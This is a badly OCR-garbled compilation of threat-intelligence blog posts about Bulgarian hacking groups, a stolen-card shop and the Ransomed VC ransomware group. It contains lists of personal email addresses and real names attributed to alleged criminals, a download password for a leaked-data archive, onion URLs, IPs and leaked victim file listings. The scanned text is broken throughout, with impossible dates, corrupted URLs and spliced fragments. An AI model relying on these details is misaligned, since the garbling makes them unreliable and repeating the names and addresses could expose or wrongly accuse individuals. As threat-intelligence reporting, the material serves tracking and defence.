droope .info - Email: deciable@gmail.com 
empery .info - Email: phvandiv@gmail.com 
engirt .info - Email: jaohra@gmail.com 
eratile .info - Email: magoetzim@gmail.com 
erpeer .info - Email: deciable@gmail.com 
evyns. info - Email: magoetzim@gmail.com 
exampl .info - Email: krharbou@gmail.com 
extrip .info - Email: piproux@gmail.com 
fatted .info - Email: stthatch@gmail.com 
fedar. info - Email: phvandiv@gmail.com 
fifthz .info - Email: stthatch@gmail.com 
figgle .info - Email: deciable@gmail.com 
fliht .info - Email: krharbou@gmail.com 
fosset .info - Email: deciable@gmail.com 
freckl .info - Email: stthatch@gmail.com 


freiny. info - Email: krharbou@gmail.com 


froday. info - Email: deciable@gmail.com 
fulier. info - Email: deciable@gmail.com 
gaudad .info - Email: enomman@gmail.com 
gelded. info - Email: stthatch@gmail.com 
gicke .info - Email: magoetzim@gmail.com 
girded .info - Email: jaohra@gmail.com 


goterm .info - Email: calexing@gmail.com 
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[5] 
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[8] 
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[DIR] Parent Directory 
[orR] af 


19-Sep-2483 18:19 
15-Apr-2483 21:52 


[TAT] @secure.icg.com 13-Jun-2383 61:54 18k 
(TxT] Thumbs.db 88-Apr-2933 22:83 23k 
(orR] af 13-Jun-2383 91:26 - 
[IMG] apache pb.cif 63-Jul-1996 49:18 2k 
[1G] belejka3.cif 23-Sep-2383 23:67 32k 
(IMG) cardid v2.eif 66-Apr-2393 17:26 4k 
[DIR] earth/ 39-Sep-2383 63:45 - 
[T*T] htaccess 68-Apr-2393 22:29 1k 
[TAT] index.htm 13-Sep-2383 23:55 1k 
[TAT] index2.htm 13-Sep-2383 23:59 1k 
(1G) logo .cif 12-Sep-2383 23:58 3k 
(1G) Jogostandarts if 68-Apr-2383 22:63 5k 
[DIR] manual/ 26-Feb-2381 12:41 - 
[DIR] monica/ 19-Sep-2983 18:17 - 
[IMG] morder.eif 15-Jun-2383 63:53 Sk 
[1G] online-S.cif 68-Apr-2393 22:63 1k 
[T*T] order.htm 13-Jun-2383 62:33 18k 
(T*T] order2. html 15-Apr-2383 21:49 18k 
[Orr] renif 87-Oct-2983 22:07 - 
[IMG] schmitt .jpe 13-Sep-2283 23:55 169k 
[IMG] speed.jpe 13-Sep-2383 23:55 39k 
[T*T] thanks.htm 13-Jun-2383 62:31 4k 
[DIR] win sploitz/ 13-Aug-2993 21:57 - 
[DIR] xdm/ 15-Sep-2993 23:42 - 
[TAT] xdm_pass 15-Apr-2383 21:59 1k 


Sample Varna Hacking Group team members: 
CuMeOHOB - Konstantin Simeonov Kavrukov 
{MANIAC } 

Maniac666 

moni 

schMatka - Email: schmatka@schmatka.org 


xdm 


Sample Varna Hacking Group personal information: 
Personal Web site: hxxp://vhg.itgo.com/cn1.html 
Personal Email: vhg _xakepu@usa.net 


Personal Email: webmaster@vhg.itgo.com 
Related posts: 


[9]Exposing Bulgaria’s "Durzhavna Sigurnost" - The Complete Technical and Scientific Collec- 
tion Archive During the Cold War - An OSINT Analysis 


[10]Exposing Bulgaria - Or Who Build the Soviet Union’s Virus Factories in the 90’s? - An OSINT 
Analysis 
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[11]Exposing Bulgaria’s Involvement in Cold War Espionage - Who Stole the PC and Build a 
Fake Pro-Western Empire? - An OSINT Analysis 


[12]Exposing the "KGB Hack" a.k.a Operation EQUALIZER - An OSINT Analysis 


H 


, 


N 


WwW 


ms 


_hetps:/ /ologger.googleusercontent.con/ing//R29v721/AVwKsEgyVGaeqqniF oko Vpzli4TOF (6a pikePHBSASKENE 
_ bttps://ologger. googleusercontent .con/ing/t/R20v721/AVWTaER5OTVHjG4G_Qr isiBHhr ja jOrZAYUTUS600521p40 


ul 


"nstps:/fologgergoogleusercont ent co/ing//8261Z2x1/AVWHaEgAPPTr¥¥i42> iOatFCAPSGPGTao_DhabuSzeFiN0 
“nvps:/fologger. googleuserconvent con/sng/o/R29V2251AVWRGE ga FRas_n aS hs iatiak HT jpBpbgaTg_ TOU 
7. https: //blogger .googleusercontent .com/img/b/R29vZ2x1/AVvXsEj JWz2KBJ jwARuhIIR_1_60XGft_FhCW9Uue2YiBfer_ubOp 
8. https: //blogger . googleusercontent . com/img/b/R29v2Z2x1/AVVXsEjkfwk0_1zhQu28eIQHao42ZQSr IEKNNIMrdWOK3LZbB6Y qg4 
9. https: //ddanchev. blogspot . com/2021/03/exposing-bulgarias-durzhavna~sigurnost. htm] 


10. https: //ddanchev.blogspot . com/2020/05/exposing-bulgaria-or-who-build-soviet.htm 


(o>) 


11. https: //ddanchev.blogspot.com/2020/07/exposing-bulgarias-involvement-in-cold. html 


12. https: //ddanchev.blogspot .com/2021/03/exposing-kgb-hack-aka-operation.htm 


19.9.20 Can You Recognize This Guy? (2023-09-26 19:04) 


[1] 
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Dear blog readers, 


There was a speculation approximately a decade ago that | went missing. Can you recognize 
this guy in the picture? If you want to look for him try asking these people as this is me circa 
2009 when | was illegally arrested without a warrant and detained for a period of several 
months without an explanation with my ID stolen from my place and me taken with force 
from my house with no witnesses and explanation by three local police officers from the City 
of Troyan, Bulgaria and taken to an unknown car which doesn’t look like a police car with no 
explanation and taken to another city to live for a period of couple of months where | had my 
phone and personal ID taken and locked down including my belt. 


Now here comes the surprise. If you truly need to find me and of course ask these people 
that you see on the picture where | am you can also visit my Twitter account one which | on 
purposely registered for the event Christmas Holidays back in 2009 which is - 
https://twitter.com/koleda2009 where here comes the surprise | checked in in my place with 
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big respect and apologies to all my friends who know what | work and what I’ve been up to 
including the actual location where | was back then basically in the woods however with a 
return ticket. 


Sample photo: 


Stay tuned! 


1. https://blogger. googleusercontent .com/img/b/R29vZ2x1/AVvXsEiDhRNwoPMC1sz9E-- Y9OVV3BmLDf ssUOun4¢f 5n j VO3M2nF p 


O1aWMj vrgwcA1BWUMVN2CPEvtmRsPmGDp3Ls2rCYviyC548zQ-6QcQ 
2. https://blogger .googleusercontent .com/img/b/R29vZ2x1/AVvXsEhg390ynmYiA3aLFM1CUyrxmLOzucIP8_OgOtXKXFzIkC8Zg 


14M8cTyMSL£Pxn8kaJcRmjuqpnAIBm15bQhNVDxxDw1lb-1ZENWXBi 
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19.9.21 Exposing A Portfolio of Personally Identifiable Email Address Accounts from 
An E-Shop for Stolen Credit Card Details (2023-09-26 20:00) 
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Dear blog readers, 


A ALATA LALA! GALA PALE 


fer tor fv bes: 
NAP AU AGA AACA AA 


Oe £5 Sip Bs fe &s 


[1] 


I’ve decided to share with everyone a recently portfolio of personally identifiable email address 
accounts known to belong to users of a popular E-Shop for stolen and compromised credit card 


accounting details. 


Sample personally identifiable email address accounts include: 


collinsescober[.]yahoo.com 
kerrybarness[.]gmail.com 
wolk48[.]bk.ru 

bosssss[. ]bossy.cc 
smokinwetmarley[.]gmail.com 
elenakrasotka[.Jgmx.com 
roger.moon|[.]post.com 
frr[.]frr.ru 
varmer1982[.]gmail.com 
rO[.]rO.ru 
micheal1717[.]yahoo.com 
karlsonas[.]safe-mail.net 
elhenawy5[.]yahoo.com 
naemnik1777[.]qip.ru 
erwinfontilla[.]yahoo.com 
makteejay112[.]yahoo.com 
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darkman135[.]gmail.com 
elisasuiter[. yahoo.com 
lob[.]ya.ru 
suetrel93[.]gmail.com 
geforse77[.]gmail.com 


steamforyoul[.]yahoo.com 


huamao0409[.]yahoo.com.cn 


i7x[.]hotmail.com 
12345qwert[.]jksdhfj.com 
tiokpsc[.]yahoo.com 
ownon[.]mail.ru 
jowis5459[.]yahoo.com 
amnetcom[.]yahoo.fr 
susiraukes[.]gmail.com 
cuilizi88[.]gmail.com 
dedfft[.Jgmail.com 

vom _uk[.]yahoo.co.uk 
riktikas[.]yahoo.co.uk 
pjeanlab[.]Jgmail.com 
Brown6926[. ]hotmail.com 
waldemarfoot[.]ymail.com 
jamesnterry[.]gmail.com 
marzelv[.]Jgmail.com 
say[.]O-mail.com 
elips777[.]yahoo.com 
zloikak[.]pochta.ru 
sentento[.]yahoo.com 
mnbvcbnm[.]mail.ru 
y777z[.]mail.ru 
gled123[.]mail.ru 
aliasw[.]hotmail.com 
erik.sgrs[.]gmail.com 
willsresults[.]gmail.com 
dumpstoday[.]yahoo.com 


wali _made7[.]yahoo.com 
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celewolfs[.]hotmail.com 
cashootmen[.]yahoo.com 
honkman28[.]yahoo.com 
bugiman007[.]yahoo.com 
v[.]Jcamfex.com 

empty _boys[.]yahoo.com 
ivhbful76[.]hotmail.com 
laqlx[.]yahoo.com 
nixbella[.]yahoo.com 
elfuerte809[.]live.com 
krasavec5275[.]mail.ru 
asdal[.]Jme.com 
bustachek[.]mail.ru 
myfletch[.]Jgmail.com 
sotazynubagyhewo[. ]tempomail.fr 
j _kelven1[.]yahoo.com 
goodvisa[.]gmail.com 
dave _boiz[.]yahoo.co.uk 
wulfear[.]mail.ru 
milad0936[.]yahoo.com 
credit-man[.]hotmail.com 
j4malz[.Jgmail.com 
sadygaxx[.]mail.ru 
johnblaseuk[.]yahoo.co.uk 
mayseller[.]mayseller.com 
XXXxXxXxX[.]yahoo.com 
orientalplc[.]live.co.uk 
933807[.]gmail.com 
f.antom[.]hotmail.com 
mcd7773244[.]yahoo.com 
lizard[.]list.ru 
kogdaprokatit[.]techie.com 
multijam[.]hotmail.com 
gvozduk1[. Jlist.ru 
Mark.D.Wood100[.]gmail.com 
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guiany. info - Email: krharbou@gmail.com 
haere .info - Email: deciable@gmail.com 
hilloa. info - Email: phvandiv@gmail.com 
holdit. info - Email: stthatch@gmail.com 
hownet .info - Email: stthatch@gmail.com 
ignomy. info - Email: jaohra@gmail.com 
implor. info - Email: jaohra@gmail.com 
inclin. info - Email: grattab@gmail.com 
inquir .info - Email: stthatch@gmail.com 
jorgan .info - Email: bebrashe@gmail.com 
kedder .info - Email: enomman@gmail.com 
knivel .info - Email: deciable@gmail.com 
krapen .info - Email: deciable@gmail.com 
lavolt .info - Email: jaohra@gmail.com 


lavyer .info - Email: bebrashe@gmail.com 
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timleema[.]hotmail.com 
jadothebest[.]hotmail.com 
anlarcs[.]yahoo.com 
lionheart0098[.]yahoo.com 
govorol[.]gmail.com 
destrater[.]yahoo.com 
InsTant[.]bk.ru 
xgreenx[.]bk.ru 
john.kanaiber[.]gmail.com 
francaispak[.]mail.ru 
night _fly _uuu[.]Jyahoo.com 
gipson[.]pochta.ru 
jjamesjxx[.]gmail.com 
jjnustlehard[.]Jgmail.com 
mors881[.]mail.ru 
jhnts444[.]Jgmail.com 
k.markus[.]yandex.com 
brianburger[.]hotmail.com 
bmw760[.]safe-mail.net 
svslip[.]gmail.com 
directdepot[.]gmail.com 
priedzza[.]inbox.|v 
gmuler[.]yahoo.com 
avolosins[.]yahoo.com 
ugmarket[.]yahoo.com 
colahn[.]yahoo.com 
fourb1960[.]gmail.com 
giant777[.]safe-mail.net 
magomedovmaksim|[.]yandex.ru 
akndl[.]N.com 
mmaj.tony[.]yahoo.com 
wincunia[.]gmail.com 
aslike[.]Jaol.com 
derikbowl[.]gmail.com 
dario _nixon78[.]yahoo.de 
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jooncooper[.]yahoo.com 
umang _ni[.]hotmail.com 
van.duel[.]gmail.com 
levieux100[.]laposte.net 
parayan3[.]gmail.com 
rurushiu[.]yahoo.cn 

sherpsis[. live.com 
zOmbie86[.]mail.ru 
maestro0022[.]hotmail.com 
lrabezerra[.]gmail.com 
j.kelven16[.]gmail.com 
smokos[.]mail.ru 
nguyenkimhanoi[.]gmail.com 
WandaPandolfi553761[.]hotmail.com 
elnino _carder[.]yahoo.com 
corpse20092009[.]yahoo.com 
161085[.]gmail.com 
vocean2925[.]gmail.com 
aderistovO[.]gmail.com 
vmda0l1[.]gmail.com 
sicol[.]yahoo.ng 
sic111k[.]gmx.de 
dlinnya[.Jgmail.com 
pastorcat100[.]yahoo.com 
madonnalovedream[.]gmail.com 
tastedick[.]yahoo.com 
trafcc[.]ya.ru 
777[.]graduate.org 
residentevil _xxx[.]yahoo.com 
jam1982[.]yahoo.com 
admin[.]insoul.name 
johnyypot[.]yandex.ru 
magret.canard[. ]free.fr 
eupetition[.]gmail.com 
cotedazur06000[.]gmail.ru 
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i3i[.]mail.ru 

magikOO[. ]live.it 
xyeglaz1[.]yahoo.com.au 
qtecvogs[.]gmail.com 
electronicstech[. ]hotmail.co.uk 
cashmic7[.]yahoo.co.uk 
slgamegold[.]hotmail.com 
lait[.]Jsibnet.ru 
mantaskazlauskas[.]safe-mail.net 
nikryl[.]mail.com 

hotty _stuffin[.]yahoo.com 
razorme[.]ymail.com 
mynetthebest[.]gmail.com 
dongyaju[.]gmail.com 

uo _jia[.]163.com 
a.mike37[.]gmail.com 
yueling77[.]hotmail.com 
iwandem.]yandex.ru 
cocl2ph[.]mail.ru 
cookieman-18[. ]live.co.uk 
kenjocarlos[.]yahoo.com 
terrence[.]virgindsl.co.uk 
dirchaw[.]gmail.com 
jen140[.]gmail.com 
franksinatratratra[.]gmail.com 
ebay4biz[.]yahoo.com 
d.speed[.Jovi.com 
dimon4g[.]mail.ru 
portado00[.]gmail.com 
dizvar[.]yahoo.com 

llopetu[. yahoo.com 
schulz.seo[.]gmail.com 
rasejo83[.]gmail.com 
gorgedunworry[.]yahoo.com 
privod07[.]bk.ru 
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francisduchat[.]yahoo.com 
dinokarti[.]yahoo.co.uk 
wisementalk[.]gmail.com 
ieip39[.]yahoo.com 
jolopero[.]icqmail.com 
wabalas1[.]yahoo.co.uk 
ingrosso999[.]googlemail.com 
hemenhemde[.]yahoo.com 
stefan _1[.]live.se 
runninghb27[.]gmail.com 
zhukraend2012[.]mail.com 
kastalomikq[.]gmail.com 
england0071[.]Jrambler.ru 
sferzers[.]yandex.ru 
baloghea007[.]gmail.com 
a4512517[.]mailinator.com 
a4512517[.]bofthew.com 
arunas80[.]mail.com 
danielvogla[.]yahoo.co.uk 
balogun _olamide[.]yahoo.com 
keinehabe[.]hotmail.com 
polihroniskirkanidis[.]rocketmail.com 
wemfii23me443sd[.]gmail.com 
dkponti[.]yahoo.com 
alice996[.]ymail.com 
goodwork11[.]yandex.ru 
narina[.]Jnarina.com 
login4o297[.]gmail.com 
wackjob[.]rocketmail.com 
herrmann _kristin[. yahoo.com 
kissholy[.]msn.com 
nazik78[.]Jgmail.com 

pro _porn[.]bk.ru 

loki[.]xory.us 
billkissen[.]yahoo.com 
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wkd187[.]gmail.com 
roizman{[.]roizman.ru 
quad45[.]ymail.com 
antex149[.]yandex.ru 
patmacc[.]blag.com 
all.reseller[.]yahoo.com 
savilovvk[.]yahoo.com 
ustyk[.]i.ua 
mv.24[.]live.com 
sightly.1st[.]gmail.com 
kirilltucsoin[.]yandex.ru 
vanabsten2[.]gmail.com 
all.reseller[.]yahoo.co.uk 
baochua2004[.]yahoo.com 
someguy _84[.]hotmail.co.uk 
nuodis[.]gmail.com 
vipcarton[.]gmail.com 
gO0Oglehack[.]mail.ru 
metelkal[.]yahoo.com 
timohal[.]hotmail.co.uk 
vipvasja[.]googlemail.com 
bgg798[.]yandex.ru 
star06[.]ua.fm 
abudabis[.]writeme.com 
banksrus[.]gmail.com 
mr.bundles[.]ymail.com 
nolimitsoldier[.]live.co.uk 
bidswamil.]mail.ru 
antonieomir[.]aol.com 
samyray15[.]gmail.com 
mllssteve200[.]ovi.com 
xtreme0O[.]email.ru 
mllssteve100[.]ovi.com 
empirio[.]bk.ru 


vintnes2006[.]rambler.ru 
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moria4ok[.]nxt.ru 
alljob[.]rocketmail.com 
lopkjj[.Jmail.ru 

Bum3ris[. inbox. It 
vikings20003000[.]gmail.com 
jeilaniO8[. ]hotmail.co.uk 
anskier[.]gmail.com 
nrlmd[.]Jyahoo.com 
v666ok[.]yandex.ru 
treiber345[.]yahoo.com 
gheli66[.]gmail.com 
alekc97god[.]yandex.ru 
easymiaki[.]yahoo.com 
alexenginespb[.]gmail.com 
lansilnew[.]yandex.ru 
yadimon79[.]gmail.com 
sylforte92[.]yahoo.com 
amonn[.]Jemail.com 
jahnnojahnnon[.]yahoo.com 
cockett[.]ymail.com 
realforeva[.]gmail.com 
onyx-94[.]mail.ru 
Rusikbuben[.]yahoo.com 
saviakas[.]safe-mail.net 
speaker8888[.]gmail.com 
sashfren[.]gmail.com 
hormonas[.]gmail.com 
mago10090[.]yahoo.com 
zero soft studio[.]hotmail.com 
tsemprul[.]live.com 
hackerday[.]hotmail.com 
zhirkova.ekaterina[.]yandex.ru 
seunjoel[.]yahoo.de 
mazassd[.]gmail.com 
hia.riyo[.]gmail.com 
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awasthi007[.]ymail.com 
wgorbin[.]yahoo.com 
astonish77[.]safe-mail.net 
iamprince21[.]gmail.com 
macgbber[.]gmail.com 
triang.giang[.]gmail.com 
papoose4kay[.]yahoo.com 
dwill77731[.]yahoo.com 
temaprikol[.]mail.ru 
noxmall33[.]gmail.com 
top _glaxy[.]Jyahoo.com 
jokiwan[.Jemail.com 
untracable[.]live.com 
kutamx[.]gmail.com 
varmer1982[.]googlemail.com 
th3d[.]live.com 
haven[.]mamboz.us 
hudson.andrew44[.]gmail.com 
david200239[.]gmail.com 
ruskan|[.]xaker.ru 
devilzone[.]ukr.net 
vfnef[.]mail.ru 
calecsandr[.]ymail.com 
123tomastomas[.]gmail.com 
homam[.]mail.ru 
klyde208[.]gmail.com 
sungurk[.]mail.ru 
jumo1995[.]yahoo.com 
mado8770[.]yahoo.com 
brya0101[.]yahoo.com 
dzinal[.]inbox.|t 
loslokos[.]mail.ru 
djose83[.]rocketmail.com 
manafegor[.]gmail.com 


onem4n[.]hotmail.com 
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pokerstar-medved[.]yandex.ru 
hhrklwerwruwerjl[.]gmail.com 
kuhibuiy8017[.]hotmail.com 
m3rchant2000[.]lyahoo.com 
mutinyinside[.]hotmail.com 
adamjusz007[.]mail.com 
Efectukazz[.]gmail.com 
nosound[. Jinfo.|t 
kaunas2012[.]gmail.com 
nalukas[.]gmail.com 
activeman[.]email.com 
laoksis93[.]hotmail.de 
joansents[.]yahoo.com 
marastill[.]Safe-mail.net 
mofa286[.]gmail.com 
fernand1695[.]yahoo.fr 
vipnew32[.]hotmail.com 
rynka.|td[.]gmail.com 
dxclub85[.]yahoo.com 
unshi.star[.]hotmail.com 
westmin5196[.]gmail.com 
tt77 7tt[.]tt777tt.com 
qbishon[.]hotmail.com 

math master 07[.]yahoo.com 
niltononly[.Jaol.com 
Shehrozs[.]play-more.ru 
kykapeky[.]ymail.com 
kumertay[.]yandex.ru 
annawolf29[.]yahoo.com 
flecha20091[.]hotmail.com 
bols5[.]yandex.ru 
smirego[.]yahoo.de 
volfymac[.Jeb2a.com 
kingkon1851[.Jaol.com 
sweetyanastasiya[.]ymail.com 
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1slavik176[.]mail.ru 
darling.mary2010[.]yahoo.com 
a4729087[.]bofthew.com 
eeleeonoral[.]hotmail.com 
kytyzzov[.]mail.ru 
WestW24[.]gmail.com 


CFGvidf4334tgfdwxs[.]supermailkwe.jp 


zeuss _07[.]mail.ru 
residentevil1001[.]gmail.com 
21[.]mail.ru 

king _yu888[.]hotmail.com 
kamikadze323[.]hotmail.com 
omundyl1[.]gmail.com 
awesomeccdealer[.]gmail.com 
buzzer150[.]gmail.com 
selivan67[.]gmail.com 
catherinebuhagiar[.]ymail.com 
bbugz55[.]yahoo.com 
camson[.]mail.ru 
vmireme[.]gmail.com 
innerlinks[.]yahoo.com 
lifercito[.Jgmail.com 

monet _just[.]yahoo.com 
johda[.]cheerful.com 
vitas1204[.]mail.ru 
inforthekillmyhead[.]gmail.com 
icqdark[.]yahoo.com 
tramvai2006[.]ukr.net 
peseuro[.]gmail.com 
netcrazycc[.]yopmail.com 
zbinial[.]gmail.com 
karribean2008[.]gmail.com 
gray2pac[.]play-more.ru 
maksa1000[.]ya.ru 


joangame[.]ymail.com 
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sdkoaksd[.]asdasd.ru 
shopinc[.]ymail.com 
morakot[.]ya.ru 
geraldpiergeral[.]gmail.com 
poetlanes[.]gmail.com 
mamboz[.]mamboz.us 
yury.kindrat[.]mail.ru 
onotole[.]yopmail.com 
white874[.]yahoo.com 
doochey[.]yahoo.com 
ara728[.]mail.ru 

ekort _malikontor[.]yahoo.com 
pokerday[.]googlemail.com 
waslet44[.]yahoo.com 
enigma.cc[.]hotmail.com 
realumps[.]yahoo.com 
wacheive[.]yahoo.com 
mikejayjay12[.]yahoo.co.uk 
smokinwetmarley[.]aol.com 
stasiano[.]inbox.ru 
stuart1188[.]live.com 
dubininn[. Jlist.ru 
joker7789[.]gmail.com 
kimovsk[.]yahoo.com 

don _hack2000[.]yahoo.com 
reetrocksu[.]gmail.com 
ru__ _94[.]mail.ru 
hush999[. ]safe-mail.net 
mygitler[.]Jgmail.com 
dmjkeee[.]gmail.com 

igor struchkov85[.]mail.ru 
murzilka006[. ]mail.ru 
leva360[.]mail.ru 
plusdenet[.]yahoo.fr 
vanaimer|[.]fastmail.fm 
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lequel .info - Email: acjspain@gmail.com 
lowatt .info - Email: krharbou@gmail.com 
meanly.info - Email: krharbou@gmail.com 
meyrie.info - Email: piproux@gmail.com 
midid .info - Email: magoetzim@gmail.com 
miloty .info - Email: stthatch@gmail.com 
mobled .info - Email: magoetzim@gmail.com 
monast. info - Email: phvandiv@gmail.com 
moont. info - Email: magoetzim@gmail.com 
narowz .info - Email: enomman@gmail.com 


nevils .info - Email: stthatch@gmail.com 
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mujo[.]hushmail.com 
smirnow2008[.]mail.ru 
powersurfer008[.]gmail.com 
khanO6chnt[.]mail.ru 
komalanderson[.]yahoo.com 
moaeadc[.]me.com 
diman3239239[.]mail.ru 
nagoyasun[.]yahoo.com 
vanhal510[.]gmail.com 
agkaralkan[.]gmail.com 
e.d[.Jemail.com 
holder77[.]ymail.com 
cberushi[.]safety-mail.org 
elin[.]safe-mail.net 
mpcrosley[.]yahoo.com 
nonohellohil[. ]pisda.ru 
zaqwer[.]zaq.com 
Nikker[.]Ji.ua 


chemische-entwicklung[.]hotmail.com 


vn _dong2002[.]lyahoo.com 
nolink[.]Jusa.com 
uasno[.]mail.ru 
dvdcog[.]gmail.com 
dm[.]Jvunea.eu 
d234turner[.]yahoo.co.uk 
xboxgamer[.]umail.net 
a4939257[.]bofthew.com 
Imushin[.]yahoo.com 
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19.9.22 Dancho Danchev’s Rewards for Justice Conti Ransomware Gang Research 
and Analysis Compilation (2023-09-26 20:57) 
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Dear blog readers, 


Hot off the press. Grab it from [2]here including [3]here Password: idasjk-)a & #*(047Hasd and 
[4]here. 


Sample compilation directory listing includes: 


[5] 
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|_| Conti_Ransornware_02 

gO Conti_Ransomware_Gang_Screenshots_01 

ie Conti_Ransomware_Gang_Screenshots_02 

(a Rewards_For_Justice_Dancho_Danchev_Conti_Ransomware_Gang_Bitzlato_Cryptocurrrency_Exchange_OSINT_Photos.., 
ie Rewards_For_Justice_Dancho_Danchev_Conti_Ransomware_Gang_Fashion_Brands_Photos_2023_01 

ey Rewards_For_Justice_Trickbot_Internal_Leaked_Communication_Profiles_2023_01 

gd Trickbot_Gang_Sanctions_OSINT_Analysis_Photos_2023_01 

(a Trickbot_Gang_Sanctions_OSINT_Analysis_Photos_2023_02 
Conti_Internal_Leaked_Communication_OSINT_2023.zip 

| Conti_Ransormware_02.rar 

| Dancho_Danchev_Related_Conti_Screenshots_2023_01.zip 

| Rewards_For_Justice_Dancho_Danchev_STIX_SN1X2_loC_Conti_Ransomware_Gang_01.zip 

| Rewards_For_Justice_Trickbot_Internal_Leaked_Chats_2023_01.zip 

| Rewards_For_Justice_Trickbot_Internal_Leaked_Communication_Profiles_2023_01.zip 

BI Rewards_For_Justice_Dancho_Danchev_Conti_Ransomware_Gang_Email_Address_Accounts_2023_01 txt 

G@ Rewards_For_Justice_Dancho_Danchev_Conti_Ransomware_Gang_In_Depth_OSINT_Analysis.pdf 

z Rewards_For_Justice_Dancho_Danchev_Conti_Ransormware_Gang_Internal_Leaked_URLs_Compilation_2023_01.txt 
] Rewards_For_Justice_Dancho_Danchev_Conti_Ransomware_Gang_Internal_Leaked_URLs_Photos_Compilation_2023_0.., 
=] Rewards_For_Justice_Dancho_Danchev_Conti_Ransomware_Gang_XMPP_Jabber_Account_IDs_2023_01 txt 

WW | Rewards_For_Justice_Dancho_Danchev_Trickbot_Gang_Bitzlato_Cryptocurrency_Exchange_OSINT_Analysis,docx 
eB) Rewards_For_lustice_Dancho_Danchev_Trickbot_Gang_Email_Address_Accounts_2023_01.txt 

Ww Rewards_For_Justice_Dancho_Danchev_Trickbot_Gang_In_Depth_OSINT_Analysis.docx 


Stay tuned! 
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19.9.23 Bulgarian-Themed Ransomware Group Affects Small E-Business Web Sites 
in Bulgaria, Al Pays Ransom (2023-09-27 12:52) 
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@ransomedvc 


Account suspended 


Twitter suspends accounts which violate the Twitter 
Rules 


Wannabe ransomware affiliate partners and original ransomware creators of the World unite? 


I’ve recently came across to a small Bulgarian-themed ransomware group known as Ransomed 
VC that appears to be targeting and increasing the targeting of Bulgarian-based Web sites and 
demanding ransom in exchange for not disclosing the information that they obtained using a 
compromise of their infrastructure. 


The group appears to be cooperating with another group known as Everest Ransomware Group. 
Related details: 


admin[.]ransomed.vc 
hxxp://t.me/RansomedSupport 
hxxp://k63fo4qmdnl4cbt54sso3g6s5ycw/7ogf7i6nvxl3wcf3u6la2mlawt5qd.onio n/ 
hxxp://feamq3izzsgtna4vw24rpyhy3o0fwazlgex2zqdssavevvkkIlmtudxjad.onion/ 
TOX: 192D52C7C18F3D2693ED2453E64C53ECOCCF0255AB2291F019B65BA84442B313C410DE1321 
hxxp://twitter.com/RansomedVC 
hxxp://t.me/USISAutoLookupBot 
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Related domains known to have been involved in the campaign include: 
hxxp://breached.wiki - 172.232.4.89 


hxxp://breached.fun - 162.255.119.114 


[2] 


Ransomed.ve Affiliate Program 


[3] 


J FAQ [ MEWS | TOR J Telegram Growp / SSN Lookwp / 


RANSOMED.VC 


0 tetiner for latest mews. | LerscomelVC 


[4] 
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sallut. info - Email: deciable@gmail.com 
sawme .info - Email: stthatch@gmail.com 
scarre .info - Email: enomman@gmail.com 
scrowl. info - Email: enomman@gmail.com 
sigeia. info - Email: krharbou@gmail.com 
sighal. info - Email: stthatch@gmail.com 
speen. info - Email: enomman@gmail.com 
spelem .info - Email: bebrashe@gmail.com 
spinge. info - Email: krharbou@gmail.com 


squach. info - Email: krharbou@gmail.com 
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Ransomed Group 


[5] 
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[7] 
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Online agency that is looking forward to put canctions on the less that dared not tv pay. 


[8] 


[9] 
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See SO ENG =: 
= ransomed: 
(Ean FAR SOMME Ce 


aS OACOMLG = 


brs O) raedwc | 


, D:\optimityco\ihooker.tar\OneDrive - Optimity Advisors, 
Vame Size Packed Size Modified preated Acressed Mode User Group User ID Group ID Symbolt 
GREENE) 1 477075 f>-1,478.031.8_ 2021-07-27 drwerwarwax ) 0 i 
Microsofiifeps C208 457639 208502272 2021-07-77 dnexraxnyy 0 0 
Notebooks 162 d12 » 2021-07-27. Grwxrwarw 0 9 
ON Laptop Docu. CPL AS)318 = 8871571 456 2021-07-27. Lpwrxrwarwx 0 0 
B40 0756-4. & 512 2021-96-30 vixnwnx J 0 
DS_Store 10 244 19752 2021-07-27 EP age 0 9 
»DS_Store 40% 066 2021-07-27 TWwxTwaerwx 0 0 
. 342.012 342 528 2071-0727. eyrwarwx 0 
leon: o 0 2021°06-30 1VXTwar te J 0 
Daason @ Oprinily 182 $12 2020-01-28, rwxnwarwn 0 0 i 
jhooker.tar w $12 2021-07-30. fwxrwarwx 0 0 


[12] 
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BROKERS 


Bamuare capone me Gs.2¢ axtimma omne 17 


[13] 


 } DAoptimity.co\lisapryor {Misapryor\lisapryor.rar\lisapryor\Library\Accounts\ 


Name Size Packed Size Modified 

) NerifiedBackup 221 184 28590 2022-03-01. 
Accounsssolite 192 512 31293 2022-01-22 
Accounts4 sqlité=5.- 1“ me3 468 2022-02-18. 
Accounts4 sqlite-.. 2 653 312 £419 2022-02-18. 


Datebase Backups 


Created 


account userdata :) 


[14] 


Accesso Attributes Alte nae St 


D 


A 
A 
os 


Encrypted 
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[15] 
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date title group 


2023-09-09 moreschi.it ransomedy¢ 
2023-09-09 olx. cos ransomedyc 
2023-09-09 Shkolo.bg ransomedve 
2023-09-09 proxy-sale.com ransomedyvc 
2023-09-08 airelec.bg ransomedvc 
2023-09-08 pilini.hg ransomedyc¢ 
2023-09-08 kasida bg ransomedvc 
2023-09-08 wow northriverco.com abyss 
2023-09-08 Low Keng Hust ransomhouse 
2023-09-08 TransUnion ransomedyc 
2023-09-08 Jhooker ransomedyc 
2023-09-08 I4G Brokers ransomedyc 
2023-09-08 Optimity.co.uk ransomedvc 
2023-09-08 StateFare ransomedyc 
2023-09-08 SaP ff m 
2023-09-08 MetroClub.org ransomedvyc¢ 
2023-09-08 Powersports Marketing ransomedvc 
2023-09-08 Hawaii Health System ransomedvc 
2023-09-08 phms.com. au ransomedyc 
2023-09-08 paynesvilleareainsurance com ransomedyc 
2023-09-08 SKF cos ransomedyc 
2023-09-08 Swipe .bg ransomedve 
2023-09-08 Balmit Bulgaria ransomedyve 
2023-09-08 easydentalcare.us ransomedyc¢ 
2023-09-08  quantinuum. com ransomedyc 
2023-09-08 laasr.ey ransomedye 
2023-09-08 "the Vv .F ransomedve 
2023-09-08 makflix.eu ransomedyve 
2023-09-08 nucleus. live ransomedvc 
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https: //blogger . googleusercontent .com/img/b/R29vZ2x1/AVVXsEjOMeB3xFBMi- if cDZKOZHUtUB7tFCp7 2kI1leRxw4SM70z1 
8ZxStZxj27KCFSnYp06-TLu0G1mkWBvFbuofZmrc_qoMdaN2H9Swms 
https: //blogger . googleusercontent .com/img/b/R29vZ2x1/AVVXsEh17WCjf£CAexqK702GpGZk31uj orETTxYHrUFeTArwUsHhOE 


i9Cp9OXRSnSCNGAn7BS8qW8TIqQNO_dwEuuo0t715fIV79hkOITdLGP6 
